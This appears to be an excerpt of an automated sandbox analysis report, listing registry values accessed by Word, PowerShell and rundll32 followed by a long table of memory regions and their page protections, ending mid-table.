C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tw Cen MT Condensed Extra Bold
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Utsaah
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vani
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Verdana
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vijaya
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Viner Hand ITC
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vivaldi
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vladimir Script
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Vrinda
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Webdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wide Latin
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 2
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Wingdings 3
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Cambria Math
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Tahoma
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F6F85
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
LastPurgeTime
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
WORDFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_3082
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1036
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
SpellingAndGrammarFiles_1033
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
F6F85
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
Settings
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ZoomApp
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
ProductFiles
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTF
|
||
C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
|
MTTA
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableFileTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
EnableConsoleTracing
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
ConsoleTracingMask
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
MaxFileSize
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
FileDirectory
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\system32\qagentrt.dll,-10
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-843
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\fveui.dll,-844
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
@%SystemRoot%\System32\wuaueng.dll,-400
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
Blob
|
||
C:\Windows\SysWOW64\rundll32.exe
|
SavedLegacySettings
|
There are 338 hidden registries, click here to show them.
Memdumps
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
---|---|---|---|---|
10000000
|
unkown
|
page execute and read and write
|
||
290000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
710000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
1E0000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
270000
|
unkown
|
page execute and read and write
|
||
290000
|
unkown
|
page execute and read and write
|
||
260000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page execute and read and write
|
||
6A0000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
2C0000
|
unkown
|
page execute and read and write
|
||
140000
|
unkown
|
page execute and read and write
|
||
1D0000
|
unkown
|
page execute and read and write
|
||
220000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
240000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
10000000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
1D0D3000
|
unkown
|
page read and write
|
||
420000
|
unkown
|
page readonly
|
||
2C75000
|
unkown
|
page read and write
|
||
440000
|
unkown
|
page readonly
|
||
360000
|
heap default
|
page read and write
|
||
7CD000
|
stack
|
page read and write
|
||
20E0000
|
heap private
|
page read and write
|
||
3C0000
|
unkown
|
page readonly
|
||
360000
|
unkown
|
page readonly
|
||
1EF7000
|
unkown
|
page readonly
|
||
10021000
|
unkown
|
page execute and read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
21D0000
|
unkown
|
page readonly
|
||
EB000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
840000
|
unkown
|
page read and write
|
||
1B57D000
|
unkown
|
page read and write
|
||
2C66000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
3190000
|
unkown
|
page read and write
|
||
1B640000
|
unkown
|
page read and write
|
||
5F0000
|
unkown
|
page readonly
|
||
140000
|
unkown
|
page read and write
|
||
89E000
|
stack
|
page read and write
|
||
8DF000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page readonly
|
||
7FF00280000
|
unkown
|
page execute and read and write
|
||
2CC000
|
stack
|
page read and write
|
||
1D10A000
|
unkown
|
page read and write
|
||
617000
|
heap default
|
page read and write
|
||
7FF00170000
|
unkown
|
page execute and read and write
|
||
21A4000
|
heap private
|
page read and write
|
||
7FFFFF10000
|
unkown
|
page execute and read and write
|
||
18B000
|
unkown
|
page read and write
|
||
21E4000
|
heap private
|
page read and write
|
||
6C7000
|
heap default
|
page read and write
|
||
12C35000
|
unkown
|
page read and write
|
||
2BA0000
|
unkown
|
page read and write
|
||
C30000
|
unkown
|
page readonly
|
||
610000
|
heap default
|
page read and write
|
||
7FF0025A000
|
unkown
|
page execute and read and write
|
||
1D0DC000
|
unkown
|
page read and write
|
||
1BE0000
|
unkown
|
page read and write
|
||
27FD000
|
unkown
|
page read and write
|
||
1D06A000
|
unkown
|
page read and write
|
||
60000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page readonly
|
||
E0000
|
unkown
|
page read and write
|
||
3EE000
|
unkown
|
page read and write
|
||
1E0000
|
unkown
|
page readonly
|
||
20000
|
unkown
|
page readonly
|
||
274000
|
heap default
|
page read and write
|
||
3584000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
2C0000
|
heap default
|
page read and write
|
||
6E0000
|
heap default
|
page read and write
|
||
270000
|
heap private
|
page read and write
|
||
2BA5000
|
unkown
|
page read and write
|
||
910000
|
unkown
|
page readonly
|
||
279E000
|
stack
|
page read and write
|
||
7FF00180000
|
unkown
|
page execute and read and write
|
||
2870000
|
heap private
|
page read and write
|
||
1D9F000
|
unkown
|
page read and write
|
||
1EC000
|
unkown
|
page read and write
|
||
4C0000
|
unkown
|
page readonly
|
||
7D4000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
25C0000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2190000
|
heap private
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
138000
|
heap private
|
page read and write
|
||
E0000
|
unkown
|
page read and write
|
||
2030000
|
unkown
|
page readonly
|
||
7FF001C0000
|
unkown
|
page execute and read and write
|
||
70E000
|
heap default
|
page read and write
|
||
2D0000
|
heap default
|
page read and write
|
||
2830000
|
unkown
|
page readonly
|
||
2BAA000
|
unkown
|
page read and write
|
||
7FF0002A000
|
unkown
|
page execute and read and write
|
||
1B5FD000
|
unkown
|
page read and write
|
||
1D0D3000
|
unkown
|
page read and write
|
||
28000
|
heap private
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
223E000
|
unkown
|
page read and write
|
||
394000
|
heap private
|
page read and write
|
||
221000
|
unkown
|
page execute and read and write
|
||
6C7000
|
heap default
|
page read and write
|
||
290000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
1F00000
|
unkown
|
page read and write
|
||
230000
|
unkown
|
page read and write
|
||
370000
|
heap default
|
page read and write
|
||
1F24000
|
heap private
|
page read and write
|
||
5C0000
|
unkown
|
page readonly
|
||
1D060000
|
unkown
|
page read and write
|
||
1D0FC000
|
unkown
|
page read and write
|
||
1C16000
|
unkown
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
2BD0000
|
unkown
|
page write copy
|
||
2C2E000
|
unkown
|
page read and write | page guard
|
||
2D70000
|
unkown
|
page readonly
|
||
7CF000
|
unkown
|
page read and write
|
||
230000
|
unkown
|
page read and write
|
||
3B0000
|
heap default
|
page read and write
|
||
1D2F0000
|
unkown
|
page readonly
|
||
5D7000
|
heap default
|
page read and write
|
||
2240000
|
heap private
|
page read and write
|
||
18C000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
2720000
|
unkown
|
page read and write
|
||
69D000
|
heap default
|
page read and write
|
||
706000
|
heap default
|
page read and write
|
||
6D0000
|
heap private
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
1B5EA000
|
unkown
|
page read and write
|
||
7FF00200000
|
unkown
|
page read and write
|
||
240000
|
unkown
|
page execute and read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
1F10000
|
unkown
|
page readonly
|
||
6F1000
|
heap default
|
page read and write
|
||
1B600000
|
unkown
|
page read and write
|
||
1D10000
|
unkown
|
page readonly
|
||
3F0000
|
heap default
|
page read and write
|
||
2220000
|
unkown
|
page readonly
|
||
340000
|
heap default
|
page read and write
|
||
740000
|
unkown
|
page readonly
|
||
1B63D000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page execute and read and write
|
||
1B580000
|
unkown
|
page read and write
|
||
2B3000
|
unkown
|
page execute and read and write
|
||
2DE0000
|
heap private
|
page read and write
|
||
330000
|
unkown
|
page readonly
|
||
186000
|
unkown
|
page read and write
|
||
420000
|
heap default
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
100000
|
unkown
|
page read and write
|
||
2C95000
|
unkown
|
page read and write
|
||
1D10000
|
unkown
|
page readonly
|
||
3552000
|
unkown
|
page read and write
|
||
310000
|
heap default
|
page read and write
|
||
25FF000
|
stack
|
page read and write
|
||
8BE000
|
stack
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
3568000
|
unkown
|
page read and write
|
||
41D000
|
stack
|
page read and write
|
||
1FAB000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
1D10000
|
unkown
|
page readonly
|
||
710000
|
heap default
|
page read and write
|
||
3542000
|
unkown
|
page read and write
|
||
540000
|
unkown
|
page readonly
|
||
70B000
|
heap default
|
page read and write
|
||
1B66E000
|
unkown
|
page read and write
|
||
709000
|
heap default
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
7FF00230000
|
unkown
|
page execute and read and write
|
||
7FF00250000
|
unkown
|
page execute and read and write
|
||
427000
|
heap default
|
page read and write
|
||
2BCD000
|
stack
|
page read and write
|
||
AC000
|
stack
|
page read and write
|
||
243000
|
unkown
|
page execute and read and write
|
||
7FF00190000
|
unkown
|
page read and write
|
||
2C5D000
|
stack
|
page read and write
|
||
28B000
|
unkown
|
page read and write
|
||
2F2F000
|
stack
|
page read and write
|
||
2F4000
|
heap private
|
page read and write
|
||
1D0000
|
heap private
|
page read and write
|
||
FC000
|
unkown
|
page read and write
|
||
2B4C000
|
unkown
|
page read and write
|
||
64D000
|
heap default
|
page read and write
|
||
1B440000
|
unkown
|
page read and write
|
||
3C0000
|
unkown
|
page read and write
|
||
130000
|
heap private
|
page read and write
|
||
1BA70000
|
heap private
|
page read and write
|
||
2E1000
|
unkown
|
page execute and read and write
|
||
500000
|
heap default
|
page read and write
|
||
6D8000
|
heap default
|
page read and write
|
||
1B631000
|
unkown
|
page read and write
|
||
1B631000
|
unkown
|
page read and write
|
||
7FF00122000
|
unkown
|
page execute and read and write
|
||
214E000
|
stack
|
page read and write
|
||
790000
|
unkown
|
page read and write
|
||
1B66C000
|
unkown
|
page read and write
|
||
2C9C000
|
unkown
|
page read and write
|
||
270F000
|
stack
|
page read and write
|
||
AC000
|
stack
|
page read and write
|
||
4E7000
|
heap default
|
page read and write
|
||
5A0000
|
unkown
|
page readonly
|
||
1D108000
|
unkown
|
page read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
7FF00290000
|
unkown
|
page execute and read and write
|
||
7FF001A0000
|
unkown
|
page execute and read and write
|
||
223000
|
unkown
|
page execute and read and write
|
||
2217000
|
unkown
|
page readonly
|
||
267F000
|
stack
|
page read and write
|
||
2BD000
|
heap default
|
page read and write
|
||
160000
|
heap private
|
page read and write
|
||
1B603000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
3578000
|
unkown
|
page read and write
|
||
2B1000
|
unkown
|
page execute and read and write
|
||
8E0000
|
heap private
|
page read and write
|
||
2287000
|
unkown
|
page readonly
|
||
6B4000
|
heap default
|
page read and write
|
||
223000
|
unkown
|
page execute and read and write
|
||
1FC0000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
679000
|
heap default
|
page read and write
|
||
1FD000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
4C0000
|
unkown
|
page readonly
|
||
1E0000
|
heap private
|
page read and write
|
||
230000
|
unkown
|
page readonly
|
||
518000
|
heap default
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
21F0000
|
unkown
|
page readonly
|
||
8E8000
|
heap private
|
page read and write
|
||
282000
|
heap private
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
160000
|
unkown
|
page readonly
|
||
5B0000
|
unkown
|
page readonly
|
||
2966000
|
unkown
|
page read and write
|
||
23C000
|
stack
|
page read and write
|
||
2D6E000
|
stack
|
page read and write
|
||
6C8000
|
heap default
|
page read and write
|
||
A90000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
250000
|
unkown
|
page readonly
|
||
70000
|
unkown
|
page read and write
|
||
430000
|
unkown
|
page readonly
|
||
7FF00260000
|
unkown
|
page execute and read and write
|
||
2F7000
|
heap default
|
page read and write
|
||
C90000
|
heap private
|
page read and write
|
||
1B5E9000
|
unkown
|
page read and write
|
||
731000
|
unkown
|
page execute and read and write
|
||
2D1F000
|
stack
|
page read and write
|
||
7FFFFF00000
|
unkown
|
page execute and read and write
|
||
2C2F000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
674000
|
heap default
|
page read and write
|
||
2200000
|
heap private
|
page read and write
|
||
32A000
|
heap default
|
page read and write
|
||
687000
|
heap default
|
page read and write
|
||
24F0000
|
unkown
|
page readonly
|
||
6E0000
|
heap default
|
page read and write
|
||
2B7000
|
heap default
|
page read and write
|
||
12E80000
|
unkown
|
page read and write
|
||
790000
|
unkown
|
page readonly
|
||
2D1E000
|
stack
|
page read and write
|
||
810000
|
heap private
|
page read and write
|
||
1D0FC000
|
unkown
|
page read and write
|
||
90000
|
unkown
|
page readonly
|
||
217E000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
3D0000
|
heap private
|
page read and write
|
||
7F0000
|
unkown
|
page readonly
|
||
2892000
|
heap private
|
page read and write
|
||
2240000
|
unkown
|
page readonly
|
||
356E000
|
unkown
|
page read and write
|
||
1F20000
|
heap private
|
page read and write
|
||
414000
|
heap private
|
page read and write
|
||
68D000
|
heap default
|
page read and write
|
||
2D0000
|
heap private
|
page read and write
|
||
2E3000
|
unkown
|
page execute and read and write
|
||
3D0000
|
heap private
|
page read and write
|
||
8ED000
|
unkown
|
page read and write
|
||
1B640000
|
unkown
|
page read and write
|
||
384000
|
heap default
|
page read and write
|
||
1D11F000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
180000
|
unkown
|
page read and write
|
||
38E000
|
heap default
|
page read and write
|
||
697000
|
heap default
|
page read and write
|
||
258E000
|
unkown
|
page read and write
|
||
697000
|
heap default
|
page read and write
|
||
2410000
|
unkown
|
page readonly
|
||
2820000
|
unkown
|
page readonly
|
||
4D0000
|
unkown
|
page readonly
|
||
8C0000
|
heap private
|
page read and write
|
||
2780000
|
unkown
|
page readonly
|
||
2F0000
|
heap private
|
page read and write
|
||
1EF7000
|
unkown
|
page readonly
|
||
671000
|
heap default
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
BC000
|
unkown
|
page read and write
|
||
684000
|
heap default
|
page read and write
|
||
2B1A000
|
heap private
|
page execute and read and write
|
||
1D0FC000
|
unkown
|
page read and write
|
||
2EB000
|
stack
|
page read and write
|
||
667000
|
heap default
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
701000
|
heap default
|
page read and write
|
||
910000
|
unkown
|
page readonly
|
||
223000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
657000
|
heap default
|
page read and write
|
||
100000
|
unkown
|
page readonly
|
||
2270000
|
heap private
|
page read and write
|
||
1B970000
|
unkown
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
7EFDF000
|
unkown
|
page read and write
|
||
275F000
|
stack
|
page read and write
|
||
5E0000
|
unkown
|
page readonly
|
||
7FF000E2000
|
unkown
|
page execute and read and write
|
||
3A0000
|
unkown
|
page readonly
|
||
1BB000
|
unkown
|
page read and write
|
||
650000
|
heap default
|
page read and write
|
||
285D000
|
unkown
|
page read and write
|
||
140000
|
unkown
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
2AA000
|
stack
|
page read and write
|
||
1FC000
|
unkown
|
page read and write
|
||
170000
|
unkown
|
page execute and read and write
|
||
3F0000
|
unkown
|
page readonly
|
||
1F8000
|
heap private
|
page read and write
|
||
1CC000
|
unkown
|
page read and write
|
||
1EF7000
|
unkown
|
page readonly
|
||
2A30000
|
unkown
|
page write copy
|
||
660000
|
heap default
|
page read and write
|
||
2EDE000
|
unkown
|
page read and write
|
||
1FE5000
|
heap private
|
page read and write
|
||
230000
|
unkown
|
page readonly
|
||
1F0000
|
heap private
|
page read and write
|
||
1EF7000
|
unkown
|
page readonly
|
||
10000000
|
unkown image
|
page readonly
|
||
1D111000
|
unkown
|
page read and write
|
||
2770000
|
unkown
|
page readonly
|
||
545000
|
heap default
|
page read and write
|
||
1CB60000
|
heap private
|
page read and write
|
||
1EE0000
|
unkown
|
page readonly
|
||
3C06000
|
unkown
|
page read and write
|
||
1D0FC000
|
unkown
|
page read and write
|
||
357000
|
heap default
|
page read and write
|
||
20000
|
unkown
|
page readonly
|
||
1B410000
|
unkown
|
page readonly
|
||
440000
|
heap default
|
page read and write
|
||
24E0000
|
unkown
|
page readonly
|
||
529000
|
heap default
|
page read and write
|
||
2280000
|
unkown
|
page readonly
|
||
1B631000
|
unkown
|
page read and write
|
||
2DF0000
|
unkown
|
page readonly
|
||
1F10000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
216000
|
unkown
|
page read and write
|
||
1B63D000
|
unkown
|
page read and write
|
||
200000
|
heap private
|
page read and write
|
||
353F000
|
unkown
|
page read and write
|
||
1B64C000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
2B50000
|
unkown
|
page readonly
|
||
2FE000
|
heap default
|
page read and write
|
||
1B70000
|
unkown
|
page readonly
|
||
281E000
|
stack
|
page read and write
|
||
280000
|
heap default
|
page read and write
|
||
607000
|
heap default
|
page read and write
|
||
12DA1000
|
unkown
|
page read and write
|
||
2B94000
|
unkown
|
page read and write
|
||
29ED000
|
unkown
|
page read and write
|
||
4B0000
|
heap default
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
250000
|
heap private
|
page read and write
|
||
3558000
|
unkown
|
page read and write
|
||
20F0000
|
unkown
|
page readonly
|
||
1C0000
|
unkown
|
page execute and read and write
|
||
3246000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
127000
|
heap default
|
page read and write
|
||
213000
|
unkown
|
page execute and read and write
|
||
1B0000
|
unkown
|
page execute and read and write
|
||
20000
|
unkown
|
page readonly
|
||
2790000
|
unkown
|
page readonly
|
||
450000
|
unkown
|
page readonly
|
||
2680000
|
unkown
|
page write copy
|
||
264000
|
heap private
|
page read and write
|
||
4D4000
|
heap default
|
page read and write
|
||
1B5FD000
|
unkown
|
page read and write
|
||
26C0000
|
unkown
|
page readonly
|
||
2D7E000
|
unkown
|
page read and write
|
||
2217000
|
unkown
|
page readonly
|
||
292F000
|
unkown
|
page read and write
|
||
1CC80000
|
unkown
|
page readonly
|
||
1D065000
|
unkown
|
page read and write
|
||
215F000
|
stack
|
page read and write
|
||
2410000
|
unkown
|
page readonly
|
||
1B66C000
|
unkown
|
page read and write
|
||
6CD000
|
heap default
|
page read and write
|
||
10021000
|
unkown
|
page execute and read and write
|
||
1A0000
|
unkown
|
page readonly
|
||
6B4000
|
heap default
|
page read and write
|
||
1D186000
|
unkown
|
page read and write
|
||
493000
|
heap default
|
page read and write
|
||
2060000
|
unkown
|
page readonly
|
||
10021000
|
unkown
|
page execute and read and write
|
||
1CC7E000
|
unkown
|
page read and write
|
||
64F000
|
unkown
|
page read and write
|
||
2720000
|
unkown
|
page read and write
|
||
1D10000
|
unkown
|
page readonly
|
||
7FF0003C000
|
unkown
|
page execute and read and write
|
||
7FF000F5000
|
unkown
|
page read and write
|
||
5D0000
|
unkown
|
page readonly
|
||
7FF00022000
|
unkown
|
page execute and read and write
|
||
1C73D000
|
unkown
|
page read and write
|
||
397000
|
heap default
|
page read and write
|
||
270F000
|
stack
|
page read and write
|
||
7CE000
|
unkown
|
page read and write
|
||
2A80000
|
heap private
|
page read and write
|
||
4ED000
|
heap default
|
page read and write
|
||
276C000
|
unkown
|
page read and write
|
||
2BBE000
|
unkown
|
page read and write
|
||
733000
|
unkown
|
page execute and read and write
|
||
20000
|
heap private
|
page read and write
|
||
D0000
|
unkown
|
page readonly
|
||
320000
|
heap private
|
page read and write
|
||
1BB3F000
|
heap private
|
page read and write
|
||
240000
|
heap default
|
page read and write
|
||
647000
|
heap default
|
page read and write
|
||
1D0000
|
heap private
|
page read and write
|
||
221000
|
unkown
|
page execute and read and write
|
||
6A0000
|
heap default
|
page read and write
|
||
3581000
|
unkown
|
page read and write
|
||
367000
|
heap default
|
page read and write
|
||
6B0000
|
heap default
|
page read and write
|
||
220000
|
unkown
|
page readonly
|
||
21B2000
|
heap private
|
page read and write
|
||
218E000
|
unkown
|
page read and write
|
||
10023000
|
unkown
|
page execute and read and write
|
||
2720000
|
unkown
|
page read and write
|
||
380000
|
unkown
|
page readonly
|
||
2F0000
|
unkown
|
page readonly
|
||
1B440000
|
unkown
|
page read and write
|
||
221000
|
unkown
|
page execute and read and write
|
||
390000
|
heap default
|
page read and write
|
||
1F0000
|
unkown
|
page execute and read and write
|
||
1E0000
|
heap default
|
page read and write
|
||
1B61E000
|
unkown
|
page read and write
|
||
2550000
|
unkown
|
page read and write
|
||
2A4000
|
heap default
|
page read and write
|
||
1B66C000
|
unkown
|
page read and write
|
||
444000
|
heap default
|
page read and write
|
||
770000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
1DD0000
|
heap private
|
page execute and read and write
|
||
357E000
|
unkown
|
page read and write
|
||
1F3000
|
unkown
|
page execute and read and write
|
||
680000
|
heap private
|
page read and write
|
||
1BB00000
|
heap private
|
page read and write
|
||
1D107000
|
unkown
|
page read and write
|
||
2C6C000
|
unkown
|
page read and write
|
||
2FD000
|
heap default
|
page read and write
|
||
25D0000
|
unkown
|
page read and write
|
||
2180000
|
unkown
|
page readonly
|
||
390000
|
heap private
|
page read and write
|
||
22D0000
|
unkown
|
page read and write
|
||
2874000
|
heap private
|
page read and write
|
||
2C80000
|
unkown
|
page write copy
|
||
7FF001F0000
|
unkown
|
page read and write
|
||
200000
|
unkown
|
page execute and read and write
|
||
27A0000
|
unkown
|
page readonly
|
||
2720000
|
unkown
|
page read and write
|
||
24D0000
|
unkown
|
page read and write
|
||
500000
|
unkown
|
page readonly
|
||
8A000
|
stack
|
page read and write
|
||
630000
|
heap private
|
page read and write
|
||
241000
|
unkown
|
page execute and read and write
|
||
12C31000
|
unkown
|
page read and write
|
||
280000
|
heap private
|
page read and write
|
||
29B000
|
heap default
|
page read and write
|
||
7EFDF000
|
unkown
|
page read and write
|
||
10000000
|
unkown image
|
page readonly
|
||
160000
|
unkown
|
page readonly
|
||
100000
|
unkown
|
page write copy
|
||
3AF000
|
unkown
|
page read and write
|
||
2D6E000
|
stack
|
page read and write
|
||
7F0000
|
heap private
|
page read and write
|
||
2930000
|
unkown
|
page read and write
|
||
6CD000
|
heap default
|
page read and write
|
||
2C10000
|
unkown
|
page readonly
|
||
5F4000
|
heap default
|
page read and write
|
||
140000
|
heap default
|
page read and write
|
||
3539000
|
unkown
|
page read and write
|
||
562000
